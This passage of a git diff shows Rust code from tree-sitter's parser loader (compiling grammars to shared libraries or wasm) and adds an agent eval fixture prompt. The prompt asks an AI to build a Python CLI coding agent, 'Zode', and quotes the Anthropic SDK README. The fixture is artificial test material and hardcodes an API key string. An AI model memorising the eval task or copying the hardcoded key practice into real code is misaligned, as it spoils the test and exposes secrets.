self.wasm_store.lock().unwrap().is_some() { + path.set_extension("wasm"); + } + path + }); + config.output_path = Some(output_path.clone()); + + let parser_path = config.src_path.join("parser.c"); + config.scanner_path = self.get_scanner_path(config.src_path); + + let mut paths_to_check = vec![parser_path]; + + if let Some(scanner_path) = config.scanner_path.as_ref() { + paths_to_check.push(scanner_path.clone()); + } + + paths_to_check.extend( + config + .external_files + .unwrap_or_default() + .iter() + .map(|p| config.src_path.join(p)), + ); + + if !recompile { + recompile = needs_recompile(&output_path, &paths_to_check) + 
.with_context(|| "Failed to compare source and binary timestamps")?; + } + + #[cfg(feature = "wasm")] + if let Some(wasm_store) = self.wasm_store.lock().unwrap().as_mut() { + if recompile { + self.compile_parser_to_wasm( + &config.name, + None, + config.src_path, + config + .scanner_path + .as_ref() + .and_then(|p| p.strip_prefix(config.src_path).ok()), + &output_path, + false, + )?; + } + + let wasm_bytes = fs::read(&output_path)?; + return Ok(wasm_store.load_language(&config.name, &wasm_bytes)?); + } + + let lock_path = if env::var("CROSS_RUNNER").is_ok() { + tempfile::tempdir() + .unwrap() + .path() + .join("tree-sitter") + .join("lock") + .join(format!("{}.lock", config.name)) + } else { + etcetera::choose_base_strategy()? + .cache_dir() + .join("tree-sitter") + .join("lock") + .join(format!("{}.lock", config.name)) + }; + + if let Ok(lock_file) = fs::OpenOptions::new().write(true).open(&lock_path) { + recompile = false; + if lock_file.try_lock_exclusive().is_err() { + // if we can't acquire the lock, another process is compiling the parser, wait for + // it and don't recompile + lock_file.lock_exclusive()?; + recompile = false; + } else { + // if we can acquire the lock, check if the lock file is older than 30 seconds, a + // run that was interrupted and left the lock file behind should not block + // subsequent runs + let time = lock_file.metadata()?.modified()?.elapsed()?.as_secs(); + if time > 30 { + fs::remove_file(&lock_path)?; + recompile = true; + } + } + } + + if recompile { + fs::create_dir_all(lock_path.parent().unwrap()).with_context(|| { + format!( + "Failed to create directory {}", + lock_path.parent().unwrap().display() + ) + })?; + let lock_file = fs::OpenOptions::new() + .create(true) + .truncate(true) + .write(true) + .open(&lock_path)?; + lock_file.lock_exclusive()?; + + self.compile_parser_to_dylib(&config, &lock_file, &lock_path)?; + + if config.scanner_path.is_some() { + self.check_external_scanner(&config.name, &output_path)?; + } + } + + 
let library = unsafe { Library::new(&output_path) } + .with_context(|| format!("Error opening dynamic library {}", output_path.display()))?; + let language = unsafe { + let language_fn = library + .get:: Language>>(language_fn_name.as_bytes()) + .with_context(|| format!("Failed to load symbol {language_fn_name}"))?; + language_fn() + }; + mem::forget(library); + Ok(language) + } + + fn compile_parser_to_dylib( + &self, + config: &CompileConfig, + lock_file: &fs::File, + lock_path: &Path, + ) -> Result<(), Error> { + let mut cc_config = cc::Build::new(); + cc_config + .cargo_metadata(false) + .cargo_warnings(false) + .target(BUILD_TARGET) + .host(BUILD_HOST) + .debug(self.debug_build) + .file(&config.parser_path) + .includes(&config.header_paths) + .std("c11"); + + if let Some(scanner_path) = config.scanner_path.as_ref() { + cc_config.file(scanner_path); + } + + if self.debug_build { + cc_config.opt_level(0).extra_warnings(true); + } else { + cc_config.opt_level(2).extra_warnings(false); + } + + for flag in config.flags { + cc_config.define(flag, None); + } + + let compiler = cc_config.get_compiler(); + let mut command = Command::new(compiler.path()); + command.args(compiler.args()); + for (key, value) in compiler.env() { + command.env(key, value); + } + + let output_path = config.output_path.as_ref().unwrap(); + + if compiler.is_like_msvc() { + let out = format!("-out:{}", output_path.to_str().unwrap()); + command.arg(if self.debug_build { "-LDd" } else { "-LD" }); + command.arg("-utf-8"); + command.args(cc_config.get_files()); + command.arg("-link").arg(out); + } else { + command.arg("-Werror=implicit-function-declaration"); + if cfg!(any(target_os = "macos", target_os = "ios")) { + command.arg("-dynamiclib"); + // TODO: remove when supported + command.arg("-UTREE_SITTER_REUSE_ALLOCATOR"); + } else { + command.arg("-shared"); + } + command.args(cc_config.get_files()); + command.arg("-o").arg(output_path); + } + + let output = command.output().with_context(|| { + 
format!("Failed to execute the C compiler with the following command:\n{command:?}") + })?; + + FileExt::unlock(lock_file)?; + fs::remove_file(lock_path)?; + anyhow::ensure!( + output.status.success(), + "Parser compilation failed.\nStdout: {}\nStderr: {}", + String::from_utf8_lossy(&output.stdout), + String::from_utf8_lossy(&output.stderr) + ); + Ok(()) + } + + #[cfg(unix)] + fn check_external_scanner(&self, name: &str, library_path: &Path) -> Result<()> { + let prefix = if cfg!(any(target_os = "macos", target_os = "ios")) { + "_" + } else { + "" + }; + let mut must_have = vec![ + format!("{prefix}tree_sitter_{name}_external_scanner_create"), + format!("{prefix}tree_sitter_{name}_external_scanner_destroy"), + format!("{prefix}tree_sitter_{name}_external_scanner_serialize"), + format!("{prefix}tree_sitter_{name}_external_scanner_deserialize"), + format!("{prefix}tree_sitter_{name}_external_scanner_scan"), + ]; + + let command = Command::new("nm") + .arg("-W") + .arg("-U") + .arg(library_path) + .output(); + if let Ok(output) = command { + if output.status.success() { + let mut found_non_static = false; + for line in String::from_utf8_lossy(&output.stdout).lines() { + if line.contains(" T ") { + if let Some(function_name) = + line.split_whitespace().collect::>().get(2) + { + if !line.contains("tree_sitter_") { + if !found_non_static { + found_non_static = true; + eprintln!( + "Warning: Found non-static non-tree-sitter functions in the external scanner" + ); + } + eprintln!(" `{function_name}`"); + } else { + must_have.retain(|f| f != function_name); + } + } + } + } + if found_non_static { + eprintln!( + "Consider making these functions static, they can cause conflicts when another tree-sitter project uses the same function name" + ); + } + + if !must_have.is_empty() { + let missing = must_have + .iter() + .map(|f| format!(" `{f}`")) + .collect::>() + .join("\n"); + anyhow::bail!(format!(indoc! 
{" + Missing required functions in the external scanner, parsing won't work without these! + + {missing} + + You can read more about this at https://tree-sitter.github.io/tree-sitter/creating-parsers/4-external-scanners + "})); + } + } + } + + Ok(()) + } + + #[cfg(windows)] + fn check_external_scanner(&self, _name: &str, _library_path: &Path) -> Result<()> { + // TODO: there's no nm command on windows, whoever wants to implement this can and should :) + + // let mut must_have = vec![ + // format!("tree_sitter_{name}_external_scanner_create"), + // format!("tree_sitter_{name}_external_scanner_destroy"), + // format!("tree_sitter_{name}_external_scanner_serialize"), + // format!("tree_sitter_{name}_external_scanner_deserialize"), + // format!("tree_sitter_{name}_external_scanner_scan"), + // ]; + + Ok(()) + } + + pub fn compile_parser_to_wasm( + &self, + language_name: &str, + root_path: Option<&Path>, + src_path: &Path, + scanner_filename: Option<&Path>, + output_path: &Path, + force_docker: bool, + ) -> Result<(), Error> { + #[derive(PartialEq, Eq)] + enum EmccSource { + Native, + Docker, + Podman, + } + + let root_path = root_path.unwrap_or(src_path); + let emcc_name = if cfg!(windows) { "emcc.bat" } else { "emcc" }; + + // Order of preference: emscripten > docker > podman > error + let source = if !force_docker && Command::new(emcc_name).output().is_ok() { + EmccSource::Native + } else if Command::new("docker") + .output() + .is_ok_and(|out| out.status.success()) + { + EmccSource::Docker + } else if Command::new("podman") + .arg("--version") + .output() + .is_ok_and(|out| out.status.success()) + { + EmccSource::Podman + } else { + anyhow::bail!( + "You must have either emcc, docker, or podman on your PATH to run this command" + ); + }; + + let mut command = match source { + EmccSource::Native => { + let mut command = Command::new(emcc_name); + command.current_dir(src_path); + command + } + + EmccSource::Docker | EmccSource::Podman => { + let mut command = match 
source { + EmccSource::Docker => Command::new("docker"), + EmccSource::Podman => Command::new("podman"), + EmccSource::Native => unreachable!(), + }; + command.args(["run", "--rm"]); + + // The working directory is the directory containing the parser itself + let workdir = if root_path == src_path { + PathBuf::from("/src") + } else { + let mut path = PathBuf::from("/src"); + path.push(src_path.strip_prefix(root_path).unwrap()); + path + }; + command.args(["--workdir", &workdir.to_slash_lossy()]); + + // Mount the root directory as a volume, which is the repo root + let mut volume_string = OsString::from(&root_path); + volume_string.push(":/src:Z"); + command.args([OsStr::new("--volume"), &volume_string]); + + // In case `docker` is an alias to `podman`, ensure that podman + // mounts the current directory as writable by the container + // user which has the same uid as the host user. Setting the + // podman-specific variable is more reliable than attempting to + // detect whether `docker` is an alias for `podman`. + // see https://docs.podman.io/en/latest/markdown/podman-run.1.html#userns-mode + command.env("PODMAN_USERNS", "keep-id"); + + // Get the current user id so that files created in the docker container will have + // the same owner. 
+ #[cfg(unix)] + { + #[link(name = "c")] + extern "C" { + fn getuid() -> u32; + } + // don't need to set user for podman since PODMAN_USERNS=keep-id is already set + if source == EmccSource::Docker { + let user_id = unsafe { getuid() }; + command.args(["--user", &user_id.to_string()]); + } + }; + + // Run `emcc` in a container using the `emscripten-slim` image + command.args([EMSCRIPTEN_TAG, "emcc"]); + command + } + }; + + let output_name = "output.wasm"; + + command.args([ + "-o", + output_name, + "-Os", + "-s", + "WASM=1", + "-s", + "SIDE_MODULE=2", + "-s", + "TOTAL_MEMORY=33554432", + "-s", + "NODEJS_CATCH_EXIT=0", + "-s", + &format!("EXPORTED_FUNCTIONS=[\"_tree_sitter_{language_name}\"]"), + "-fno-exceptions", + "-fvisibility=hidden", + "-I", + ".", + ]); + + if let Some(scanner_filename) = scanner_filename { + command.arg(scanner_filename); + } + + command.arg("parser.c"); + let status = command + .spawn() + .with_context(|| "Failed to run emcc command")? + .wait()?; + anyhow::ensure!(status.success(), "emcc command failed"); + let source_path = src_path.join(output_name); + fs::rename(&source_path, &output_path).with_context(|| { + format!("failed to rename wasm output file from {source_path:?} to {output_path:?}") + })?; + + Ok(()) + } + + #[must_use] + #[cfg(feature = "tree-sitter-highlight")] + pub fn highlight_config_for_injection_string<'a>( + &'a self, + string: &str, + ) -> Option<&'a HighlightConfiguration> { + match self.language_configuration_for_injection_string(string) { + Err(e) => { + eprintln!("Failed to load language for injection string '{string}': {e}",); + None + } + Ok(None) => None, + Ok(Some((language, configuration))) => { + match configuration.highlight_config(language, None) { + Err(e) => { + eprintln!( + "Failed to load property sheet for injection string '{string}': {e}", + ); + None + } + Ok(None) => None, + Ok(Some(config)) => Some(config), + } + } + } + } + + #[must_use] + pub fn get_language_configuration_in_current_path(&self) 
-> Option<&LanguageConfiguration> { + self.language_configuration_in_current_path + .map(|i| &self.language_configurations[i]) + } + + pub fn find_language_configurations_at_path( + &mut self, + parser_path: &Path, + set_current_path_config: bool, + ) -> Result<&[LanguageConfiguration]> { + let initial_language_configuration_count = self.language_configurations.len(); + + let ts_json = TreeSitterJSON::from_file(parser_path); + if let Ok(config) = ts_json { + let language_count = self.languages_by_id.len(); + for grammar in config.grammars { + // Determine the path to the parser directory. This can be specified in + // the tree-sitter.json, but defaults to the directory containing the + // tree-sitter.json. + let language_path = parser_path.join(grammar.path.unwrap_or(PathBuf::from("."))); + + // Determine if a previous language configuration in this package.json file + // already uses the same language. + let mut language_id = None; + for (id, (path, _, _)) in + self.languages_by_id.iter().enumerate().skip(language_count) + { + if language_path == *path { + language_id = Some(id); + } + } + + // If not, add a new language path to the list. 
+ let language_id = if let Some(language_id) = language_id { + language_id + } else { + self.languages_by_id.push(( + language_path, + OnceCell::new(), + grammar.external_files.clone().into_vec().map(|files| { + files.into_iter() + .map(|path| { + let path = parser_path.join(path); + // prevent p being above/outside of parser_path + anyhow::ensure!(path.starts_with(parser_path), "External file path {path:?} is outside of parser directory {parser_path:?}"); + Ok(path) + }) + .collect::>>() + }).transpose()?, + )); + self.languages_by_id.len() - 1 + }; + + let configuration = LanguageConfiguration { + root_path: parser_path.to_path_buf(), + language_name: grammar.name, + scope: Some(grammar.scope), + language_id, + file_types: grammar.file_types.unwrap_or_default(), + content_regex: Self::regex(grammar.content_regex.as_deref()), + first_line_regex: Self::regex(grammar.first_line_regex.as_deref()), + injection_regex: Self::regex(grammar.injection_regex.as_deref()), + injections_filenames: grammar.injections.into_vec(), + locals_filenames: grammar.locals.into_vec(), + tags_filenames: grammar.tags.into_vec(), + highlights_filenames: grammar.highlights.into_vec(), + #[cfg(feature = "tree-sitter-highlight")] + highlight_config: OnceCell::new(), + #[cfg(feature = "tree-sitter-tags")] + tags_config: OnceCell::new(), + #[cfg(feature = "tree-sitter-highlight")] + highlight_names: &self.highlight_names, + #[cfg(feature = "tree-sitter-highlight")] + use_all_highlight_names: self.use_all_highlight_names, + }; + + for file_type in &configuration.file_types { + self.language_configuration_ids_by_file_type + .entry(file_type.to_string()) + .or_default() + .push(self.language_configurations.len()); + } + if let Some(first_line_regex) = &configuration.first_line_regex { + self.language_configuration_ids_by_first_line_regex + .entry(first_line_regex.to_string()) + .or_default() + .push(self.language_configurations.len()); + } + + self.language_configurations.push(unsafe { + 
mem::transmute::, LanguageConfiguration<'static>>( + configuration, + ) + }); + + if set_current_path_config && self.language_configuration_in_current_path.is_none() + { + self.language_configuration_in_current_path = + Some(self.language_configurations.len() - 1); + } + } + } else if let Err(e) = ts_json { + match e.downcast_ref::() { + // This is noisy, and not really an issue. + Some(e) if e.kind() == std::io::ErrorKind::NotFound => {} + _ => { + eprintln!( + "Warning: Failed to parse {} -- {e}", + parser_path.join("tree-sitter.json").display() + ); + } + } + } + + // If we didn't find any language configurations in the tree-sitter.json file, + // but there is a grammar.json file, then use the grammar file to form a simple + // language configuration. + if self.language_configurations.len() == initial_language_configuration_count + && parser_path.join("src").join("grammar.json").exists() + { + let grammar_path = parser_path.join("src").join("grammar.json"); + let language_name = Self::grammar_json_name(&grammar_path)?; + let configuration = LanguageConfiguration { + root_path: parser_path.to_owned(), + language_name, + language_id: self.languages_by_id.len(), + file_types: Vec::new(), + scope: None, + content_regex: None, + first_line_regex: None, + injection_regex: None, + injections_filenames: None, + locals_filenames: None, + highlights_filenames: None, + tags_filenames: None, + #[cfg(feature = "tree-sitter-highlight")] + highlight_config: OnceCell::new(), + #[cfg(feature = "tree-sitter-tags")] + tags_config: OnceCell::new(), + #[cfg(feature = "tree-sitter-highlight")] + highlight_names: &self.highlight_names, + #[cfg(feature = "tree-sitter-highlight")] + use_all_highlight_names: self.use_all_highlight_names, + }; + self.language_configurations.push(unsafe { + mem::transmute::, LanguageConfiguration<'static>>( + configuration, + ) + }); + self.languages_by_id + .push((parser_path.to_owned(), OnceCell::new(), None)); + } + + 
Ok(&self.language_configurations[initial_language_configuration_count..]) + } + + fn regex(pattern: Option<&str>) -> Option { + pattern.and_then(|r| RegexBuilder::new(r).multi_line(true).build().ok()) + } + + fn grammar_json_name(grammar_path: &Path) -> Result { + let file = fs::File::open(grammar_path).with_context(|| { + format!("Failed to open grammar.json at {}", grammar_path.display()) + })?; + + let first_three_lines = BufReader::new(file) + .lines() + .take(3) + .collect::, _>>() + .with_context(|| { + format!( + "Failed to read the first three lines of grammar.json at {}", + grammar_path.display() + ) + })? + .join("\n"); + + let name = GRAMMAR_NAME_REGEX + .captures(&first_three_lines) + .and_then(|c| c.get(1)) + .with_context(|| { + format!("Failed to parse the language name from grammar.json at {grammar_path:?}") + })?; + + Ok(name.as_str().to_string()) + } + + pub fn select_language( + &mut self, + path: &Path, + current_dir: &Path, + scope: Option<&str>, + ) -> Result { + if let Some(scope) = scope { + if let Some(config) = self + .language_configuration_for_scope(scope) + .with_context(|| format!("Failed to load language for scope '{scope}'"))? + { + Ok(config.0) + } else { + anyhow::bail!("Unknown scope '{scope}'") + } + } else if let Some((lang, _)) = self + .language_configuration_for_file_name(path) + .with_context(|| { + format!( + "Failed to load language for file name {}", + path.file_name().unwrap().to_string_lossy() + ) + })? + { + Ok(lang) + } else if let Some(id) = self.language_configuration_in_current_path { + Ok(self.language_for_id(self.language_configurations[id].language_id)?) + } else if let Some(lang) = self + .languages_at_path(current_dir) + .with_context(|| "Failed to load language in current directory")? + .first() + .cloned() + { + Ok(lang.0) + } else if let Some(lang) = self.language_configuration_for_first_line_regex(path)? 
{ + Ok(lang.0) + } else { + anyhow::bail!("No language found"); + } + } + + pub fn debug_build(&mut self, flag: bool) { + self.debug_build = flag; + } + + pub fn sanitize_build(&mut self, flag: bool) { + self.sanitize_build = flag; + } + + pub fn force_rebuild(&mut self, rebuild: bool) { + self.force_rebuild = rebuild; + } + + #[cfg(feature = "wasm")] + #[cfg_attr(docsrs, doc(cfg(feature = "wasm")))] + pub fn use_wasm(&mut self, engine: &tree_sitter::wasmtime::Engine) { + *self.wasm_store.lock().unwrap() = Some(tree_sitter::WasmStore::new(engine).unwrap()); + } + + #[must_use] + pub fn get_scanner_path(&self, src_path: &Path) -> Option { + let path = src_path.join("scanner.c"); + path.exists().then_some(path) + } +} + +impl LanguageConfiguration<'_> { + #[cfg(feature = "tree-sitter-highlight")] + pub fn highlight_config( + &self, + language: Language, + paths: Option<&[PathBuf]>, + ) -> Result> { + let (highlights_filenames, injections_filenames, locals_filenames) = match paths { + Some(paths) => ( + Some( + paths + .iter() + .filter(|p| p.ends_with("highlights.scm")) + .cloned() + .collect::>(), + ), + Some( + paths + .iter() + .filter(|p| p.ends_with("tags.scm")) + .cloned() + .collect::>(), + ), + Some( + paths + .iter() + .filter(|p| p.ends_with("locals.scm")) + .cloned() + .collect::>(), + ), + ), + None => (None, None, None), + }; + self.highlight_config + .get_or_try_init(|| { + let (highlights_query, highlight_ranges) = self.read_queries( + if highlights_filenames.is_some() { + highlights_filenames.as_deref() + } else { + self.highlights_filenames.as_deref() + }, + "highlights.scm", + )?; + let (injections_query, injection_ranges) = self.read_queries( + if injections_filenames.is_some() { + injections_filenames.as_deref() + } else { + self.injections_filenames.as_deref() + }, + "injections.scm", + )?; + let (locals_query, locals_ranges) = self.read_queries( + if locals_filenames.is_some() { + locals_filenames.as_deref() + } else { + 
self.locals_filenames.as_deref() + }, + "locals.scm", + )?; + + if highlights_query.is_empty() { + Ok(None) + } else { + let mut result = HighlightConfiguration::new( + language, + &self.language_name, + &highlights_query, + &injections_query, + &locals_query, + ) + .map_err(|error| match error.kind { + QueryErrorKind::Language => Error::from(error), + _ => { + if error.offset < injections_query.len() { + Self::include_path_in_query_error( + error, + &injection_ranges, + &injections_query, + 0, + ) + } else if error.offset < injections_query.len() + locals_query.len() { + Self::include_path_in_query_error( + error, + &locals_ranges, + &locals_query, + injections_query.len(), + ) + } else { + Self::include_path_in_query_error( + error, + &highlight_ranges, + &highlights_query, + injections_query.len() + locals_query.len(), + ) + } + } + })?; + let mut all_highlight_names = self.highlight_names.lock().unwrap(); + if self.use_all_highlight_names { + for capture_name in result.query.capture_names() { + if !all_highlight_names.iter().any(|x| x == capture_name) { + all_highlight_names.push((*capture_name).to_string()); + } + } + } + result.configure(all_highlight_names.as_slice()); + drop(all_highlight_names); + Ok(Some(result)) + } + }) + .map(Option::as_ref) + } + + #[cfg(feature = "tree-sitter-tags")] + pub fn tags_config(&self, language: Language) -> Result> { + self.tags_config + .get_or_try_init(|| { + let (tags_query, tags_ranges) = + self.read_queries(self.tags_filenames.as_deref(), "tags.scm")?; + let (locals_query, locals_ranges) = + self.read_queries(self.locals_filenames.as_deref(), "locals.scm")?; + if tags_query.is_empty() { + Ok(None) + } else { + TagsConfiguration::new(language, &tags_query, &locals_query) + .map(Some) + .map_err(|error| { + if let TagsError::Query(error) = error { + if error.offset < locals_query.len() { + Self::include_path_in_query_error( + error, + &locals_ranges, + &locals_query, + 0, + ) + } else { + 
Self::include_path_in_query_error( + error, + &tags_ranges, + &tags_query, + locals_query.len(), + ) + } + } else { + error.into() + } + }) + } + }) + .map(Option::as_ref) + } + + #[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] + fn include_path_in_query_error( + mut error: QueryError, + ranges: &[(PathBuf, Range)], + source: &str, + start_offset: usize, + ) -> Error { + let offset_within_section = error.offset - start_offset; + let (path, range) = ranges + .iter() + .find(|(_, range)| range.contains(&offset_within_section)) + .unwrap_or_else(|| ranges.last().unwrap()); + error.offset = offset_within_section - range.start; + error.row = source[range.start..offset_within_section] + .matches('\n') + .count(); + Error::from(error).context(format!("Error in query file {}", path.display())) + } + + #[allow(clippy::type_complexity)] + #[cfg(any(feature = "tree-sitter-highlight", feature = "tree-sitter-tags"))] + fn read_queries( + &self, + paths: Option<&[PathBuf]>, + default_path: &str, + ) -> Result<(String, Vec<(PathBuf, Range)>)> { + let mut query = String::new(); + let mut path_ranges = Vec::new(); + if let Some(paths) = paths { + for path in paths { + let abs_path = self.root_path.join(path); + let prev_query_len = query.len(); + query += &fs::read_to_string(&abs_path) + .with_context(|| format!("Failed to read query file {}", path.display()))?; + path_ranges.push((path.clone(), prev_query_len..query.len())); + } + } else { + // highlights.scm is needed to test highlights, and tags.scm to test tags + if default_path == "highlights.scm" || default_path == "tags.scm" { + eprintln!( + indoc! {" + Warning: you should add a `{}` entry pointing to the highlights path in the `tree-sitter` object in the grammar's tree-sitter.json file. 
+ See more here: https://tree-sitter.github.io/tree-sitter/3-syntax-highlighting#query-paths + "}, + default_path.replace(".scm", "") + ); + } + let queries_path = self.root_path.join("queries"); + let path = queries_path.join(default_path); + if path.exists() { + query = fs::read_to_string(&path) + .with_context(|| format!("Failed to read query file {}", path.display()))?; + path_ranges.push((PathBuf::from(default_path), 0..query.len())); + } + } + + Ok((query, path_ranges)) + } +} + +fn needs_recompile(lib_path: &Path, paths_to_check: &[PathBuf]) -> Result { + if !lib_path.exists() { + return Ok(true); + } + let lib_mtime = mtime(lib_path) + .with_context(|| format!("Failed to read mtime of {}", lib_path.display()))?; + for path in paths_to_check { + if mtime(path)? > lib_mtime { + return Ok(true); + } + } + Ok(false) +} + +fn mtime(path: &Path) -> Result { + Ok(fs::metadata(path)?.modified()?) +} + +fn replace_dashes_with_underscores(name: &str) -> String { + let mut result = String::with_capacity(name.len()); + for c in name.chars() { + if c == '-' { + result.push('_'); + } else { + result.push(c); + } + } + result +} diff --git a/crates/agent/src/tools/evals/fixtures/zode/prompt.md b/crates/agent/src/tools/evals/fixtures/zode/prompt.md new file mode 100644 index 0000000000000000000000000000000000000000..29755d441f7a4f74709c1ac414e2a9a73fe6ac21 --- /dev/null +++ b/crates/agent/src/tools/evals/fixtures/zode/prompt.md @@ -0,0 +1,2193 @@ +- We're building a CLI code agent tool called Zode that is intended to work like Aider or Claude code +- We're starting from a completely blank project +- Like Aider/Claude Code you take the user's initial prompt and then call the LLM and perform tool calls in a loop until the ultimate goal is achieved. +- Unlike Aider or Claude code, it's not intended to be interactive. Once the initial prompt is passed in, there will be no further input from the user. 
+- The system you will build must reach the stated goal just by performing tool calls and calling the LLM +- I want you to build this in python. Use the anthropic python sdk and the model context protocol sdk. Use a virtual env and pip to install dependencies +- Follow the anthropic guidance on tool calls: https://docs.anthropic.com/en/docs/build-with-claude/tool-use/overview +- Use this Anthropic model: `claude-3-7-sonnet-20250219` +- Use this Anthropic API Key: `sk-ant-api03-qweeryiofdjsncmxquywefidopsugus` +- One of the most important pieces to this is having good tool calls. We will be using the tools provided by the Claude MCP server. You can start this server using `claude mcp serve` and then you will need to write code that acts as an MCP **client** to connect to this mcp server via MCP. Likely you want to start this using a subprocess. The JSON schema showing the tools available via this sdk are available below. Via this MCP server you have access to all the tools that zode needs: Bash, GlobTool, GrepTool, LS, View, Edit, Replace, WebFetchTool +- The cli tool should be invocable via python zode.py file.md where file.md is any possible file that contains the users prompt. As a reminder, there will be no further input from the user after this initial prompt. Zode must take it from there and call the LLM and tools until the user goal is accomplished +- Try and keep all code in zode.py and make heavy use of the asks I mentioned +- Once you’ve implemented this, you must run python zode.py eval/instructions.md to see how well our new agent tool does! + +Anthropic Python SDK README: +``` +# Anthropic Python API library + +[![PyPI version](https://img.shields.io/pypi/v/anthropic.svg)](https://pypi.org/project/anthropic/) + +The Anthropic Python library provides convenient access to the Anthropic REST API from any Python 3.8+ +application. 
It includes type definitions for all request params and response fields, +and offers both synchronous and asynchronous clients powered by [httpx](https://github.com/encode/httpx). + +## Documentation + +The REST API documentation can be found on [docs.anthropic.com](https://docs.anthropic.com/claude/reference/). The full API of this library can be found in [api.md](api.md). + +## Installation + +```sh +# install from PyPI +pip install anthropic +``` + +## Usage + +The full API of this library can be found in [api.md](api.md). + +```python +import os +from anthropic import Anthropic + +client = Anthropic( + api_key=os.environ.get("ANTHROPIC_API_KEY"), # This is the default and can be omitted +) + +message = client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", +) +print(message.content) +``` + +While you can provide an `api_key` keyword argument, +we recommend using [python-dotenv](https://pypi.org/project/python-dotenv/) +to add `ANTHROPIC_API_KEY="my-anthropic-api-key"` to your `.env` file +so that your API Key is not stored in source control. + +## Async usage + +Simply import `AsyncAnthropic` instead of `Anthropic` and use `await` with each API call: + +```python +import os +import asyncio +from anthropic import AsyncAnthropic + +client = AsyncAnthropic( + api_key=os.environ.get("ANTHROPIC_API_KEY"), # This is the default and can be omitted +) + + +async def main() -> None: + message = await client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", + ) + print(message.content) + + +asyncio.run(main()) +``` + +Functionality between the synchronous and asynchronous clients is otherwise identical. + +## Streaming responses + +We provide support for streaming responses using Server Side Events (SSE). 
+ +```python +from anthropic import Anthropic + +client = Anthropic() + +stream = client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", + stream=True, +) +for event in stream: + print(event.type) +``` + +The async client uses the exact same interface. + +```python +from anthropic import AsyncAnthropic + +client = AsyncAnthropic() + +stream = await client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello, Claude", + } + ], + model="claude-3-5-sonnet-latest", + stream=True, +) +async for event in stream: + print(event.type) +``` + +### Streaming Helpers + +This library provides several conveniences for streaming messages, for example: + +```py +import asyncio +from anthropic import AsyncAnthropic + +client = AsyncAnthropic() + +async def main() -> None: + async with client.messages.stream( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Say hello there!", + } + ], + model="claude-3-5-sonnet-latest", + ) as stream: + async for text in stream.text_stream: + print(text, end="", flush=True) + print() + + message = await stream.get_final_message() + print(message.to_json()) + +asyncio.run(main()) +``` + +Streaming with `client.messages.stream(...)` exposes [various helpers for your convenience](helpers.md) including accumulation & SDK-specific events. + +Alternatively, you can use `client.messages.create(..., stream=True)` which only returns an async iterable of the events in the stream and thus uses less memory (it does not build up a final message object for you). + +## Token counting + +To get the token count for a message without creating it you can use the `client.beta.messages.count_tokens()` method. This takes the same `messages` list as the `.create()` method. 
+ +```py +count = client.beta.messages.count_tokens( + model="claude-3-5-sonnet-20241022", + messages=[ + {"role": "user", "content": "Hello, world"} + ] +) +count.input_tokens # 10 +``` + +You can also see the exact usage for a given request through the `usage` response property, e.g. + +```py +message = client.messages.create(...) +message.usage +# Usage(input_tokens=25, output_tokens=13) +``` + +## Message Batches + +This SDK provides beta support for the [Message Batches API](https://docs.anthropic.com/en/docs/build-with-claude/message-batches) under the `client.beta.messages.batches` namespace. + + +### Creating a batch + +Message Batches take the exact same request params as the standard Messages API: + +```python +await client.beta.messages.batches.create( + requests=[ + { + "custom_id": "my-first-request", + "params": { + "model": "claude-3-5-sonnet-latest", + "max_tokens": 1024, + "messages": [{"role": "user", "content": "Hello, world"}], + }, + }, + { + "custom_id": "my-second-request", + "params": { + "model": "claude-3-5-sonnet-latest", + "max_tokens": 1024, + "messages": [{"role": "user", "content": "Hi again, friend"}], + }, + }, + ] +) +``` + + +### Getting results from a batch + +Once a Message Batch has been processed, indicated by `.processing_status === 'ended'`, you can access the results with `.batches.results()` + +```python +result_stream = await client.beta.messages.batches.results(batch_id) +async for entry in result_stream: + if entry.result.type == "succeeded": + print(entry.result.message.content) +``` + +## Tool use + +This SDK provides support for tool use, aka function calling. More details can be found in [the documentation](https://docs.anthropic.com/claude/docs/tool-use). + +## AWS Bedrock + +This library also provides support for the [Anthropic Bedrock API](https://aws.amazon.com/bedrock/claude/) if you install this library with the `bedrock` extra, e.g. `pip install -U anthropic[bedrock]`. 
+ +You can then import and instantiate a separate `AnthropicBedrock` class, the rest of the API is the same. + +```py +from anthropic import AnthropicBedrock + +client = AnthropicBedrock() + +message = client.messages.create( + max_tokens=1024, + messages=[ + { + "role": "user", + "content": "Hello!", + } + ], + model="anthropic.claude-3-5-sonnet-20241022-v2:0", +) +print(message) +``` + +The bedrock client supports the following arguments for authentication + +```py +AnthropicBedrock( + aws_profile='...', + aws_region='us-east' + aws_secret_key='...', + aws_access_key='...', + aws_session_token='...', +) +``` + +For a more fully fledged example see [`examples/bedrock.py`](https://github.com/anthropics/anthropic-sdk-python/blob/main/examples/bedrock.py). + +## Google Vertex + +This library also provides support for the [Anthropic Vertex API](https://cloud.google.com/vertex-ai?hl=en) if you install this library with the `vertex` extra, e.g. `pip install -U anthropic[vertex]`. + +You can then import and instantiate a separate `AnthropicVertex`/`AsyncAnthropicVertex` class, which has the same API as the base `Anthropic`/`AsyncAnthropic` class. + +```py +from anthropic import AnthropicVertex + +client = AnthropicVertex() + +message = client.messages.create( + model="claude-3-5-sonnet-v2@20241022", + max_tokens=100, + messages=[ + { + "role": "user", + "content": "Hello!", + } + ], +) +print(message) +``` + +For a more complete example see [`examples/vertex.py`](https://github.com/anthropics/anthropic-sdk-python/blob/main/examples/vertex.py). + +## Using types + +Nested request parameters are [TypedDicts](https://docs.python.org/3/library/typing.html#typing.TypedDict). Responses are [Pydantic models](https://docs.pydantic.dev) which also provide helper methods for things like: + +- Serializing back into JSON, `model.to_json()` +- Converting to a dictionary, `model.to_dict()` + +Typed requests and responses provide autocomplete and documentation within your editor. 
